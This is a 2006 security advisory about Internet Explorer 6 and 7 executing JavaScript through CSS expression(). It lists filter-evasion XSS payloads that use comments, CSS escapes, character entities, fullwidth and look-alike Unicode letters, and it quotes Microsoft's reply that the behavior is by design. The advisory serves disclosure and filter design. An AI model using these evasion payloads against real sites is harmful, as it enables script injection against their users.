Cause of XSS by excessive detection of "expression" in IE

Author:Yosuke HASEGAWA <yosuke.hasegawa at gmail.com>
Date: Wed, 8 Nov 2006

Abstract:
JavaScript can be included in style sheets by using
"expression()". However, IE accepts widely notation the
word "expression" everybody known. Therefore, Web application
developers - that must accept HTML tags or CSS - need to
inspect a style sheet attentively.

Tested version:
Internet Explorer 6 Japanese Edition / Windows XP SP2 Japanese Edition
Internet Explorer 7 English Edition / Windows XP SP2 Japanese Edition

Details:
IE carries out the following JavaScript in style sheet.

1) <style> block
<style>input { left:expression( alert('xss') ) } </style>

2) Inline style
<div style="{ left:exp/*  */ression( alert('xss') ) }">

3) Inject comment text
<div style="{ left:exp/*  */ression( alert('xss') ) }">

4) Using reverse solid to directe the codepoint
<div style="{ left:\0065\0078pression( alert('xss') ) }">

5) Character entity references
Character entity references is acceptable in "inline styles"
<div style="{ left:&#x0065;xpression( alert('xss') ) }">

6) Fullwidth letters
<div style="{ left:expression( alert('xss') ) }">
 e: U+FF25 or U+FF45 in Unicode, 0x8264 or 0x8285 in Shift_JIS
 x: U+FF38 or U+FF58 in Unicode, 0x8277 or 0x8298 in Shift_JIS
 p: U+FF30 or U+FF50 in Unicode, 0x826F or 0x8290 in Shift_JIS
 r: U+FF32 or U+FF52 in Unicode, 0x8271 or 0x8292 in Shift_JIS
 s: U+FF33 or U+FF53 in Unicode, 0x8272 or 0x8293 in Shift_JIS
 i: U+FF29 or U+FF49 in Unicode, 0x8268 or 0x8289 in Shift_JIS
 o: U+FF2F or U+FF4F in Unicode, 0x826E or 0x828F in Shift_JIS
 n: U+FF2E or U+FF4E in Unicode, 0x826D or 0x828E in Shift_JIS

7) Particular bit of Unicode characters
<div style="{ left:expRessioN( alert('xss') ) }">
R is U+0280, N is U+0274 or U+207F.

Above 1 to 7 is possible even that combines mutually and write.
6) and 7) is not worked in IE7.

Note that the "url()" is also widely acceptable.
Fullwidth letters or U+0280, U+029F are available to spell in
"url" for Internet Explorer 6.

Backgrounds:
This case is not the vulnerability of IE, but security problem
which carries out the cause of the XSS, I thought and reported to
Microsoft via IPA/ISEC (http://www.ipa.go.jp/security/index-e.html).
And I received the comment as following from Microsoft via IPA/ISEC:
--
As a result of having confirmed in our company development department,
this phenomenon is the behavior by design of Internet Explorer, 
and it was judged it does not fit the definition of vulnerability.
Therefore, when problem occurs on the Web site due to this operation, 
filtering on Web application side it is necessary to go appropriately. 
--

Original advisory:
http://archive.openmya.devnull.jp/2006.08/msg00369.html

See also:
https://www.webappsec.jp/modules/bwiki/index.php?IE%A4%CEexpression%A4%C8url